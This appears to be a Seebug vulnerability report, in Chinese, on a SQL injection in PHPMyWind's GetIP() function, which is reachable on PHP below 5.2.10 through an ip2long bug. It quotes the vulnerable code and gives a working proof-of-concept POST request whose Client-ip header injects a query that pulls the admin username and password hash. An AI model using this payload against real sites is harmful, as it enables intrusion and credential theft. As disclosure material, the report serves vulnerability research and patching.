PHPMyWind一处注入(鸡肋)

2014-10-30T00:00:00
ID SSV:94773
Type seebug
Reporter Root
Modified 2014-10-30T00:00:00

Description

简要描述:

sql注射。

详细说明:

include\common.func.php:

``` function GetIP() { static $ip = NULL; if($ip !== NULL) return $ip;

    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $pos = array_search('unknown',$arr);
        if(false !== $pos) unset($arr[$pos]);
        $ip  = trim($arr[0]);
    }
    else if(isset($_SERVER['HTTP_CLIENT_IP']))
    {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    else if(isset($_SERVER['REMOTE_ADDR']))
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }

    //IP地址合法验证
    $ip = (false !== ip2long($ip)) ? $ip : '0.0.0.0';  //在低版本的php中ip2long有个bug,利用此bug可以绕过此处IP检查,进行sql注射
    return $ip;
}

```

相关链接: http://www.securityfocus.com/archive/1/archive/1/441529/100/100/threaded 2009年4月29日修复:http://git.php.net/?p=php-src.git;a=commit;h=1e09a216e4ed789b497a116140ae0a2a066f66ef 影响范围: 针对php <5.2.10 的版本 (鸡肋原因)

漏洞证明:

数据包中在1.2.3.4后面跟一个TAB:

POST /PHPMyWind/vote.php?id=1 HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 35 Content-Type: application/x-www-form-urlencoded Client-ip: 1.2.3.4 ' or @`'` AND ( SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM pmw_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b) or @`'` and ''=' options%5B%5D=1&voteid=1&action=add

<img src="https://images.seebug.org/upload/201410/301554453731dbb6368266266c8115bffe4233bf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">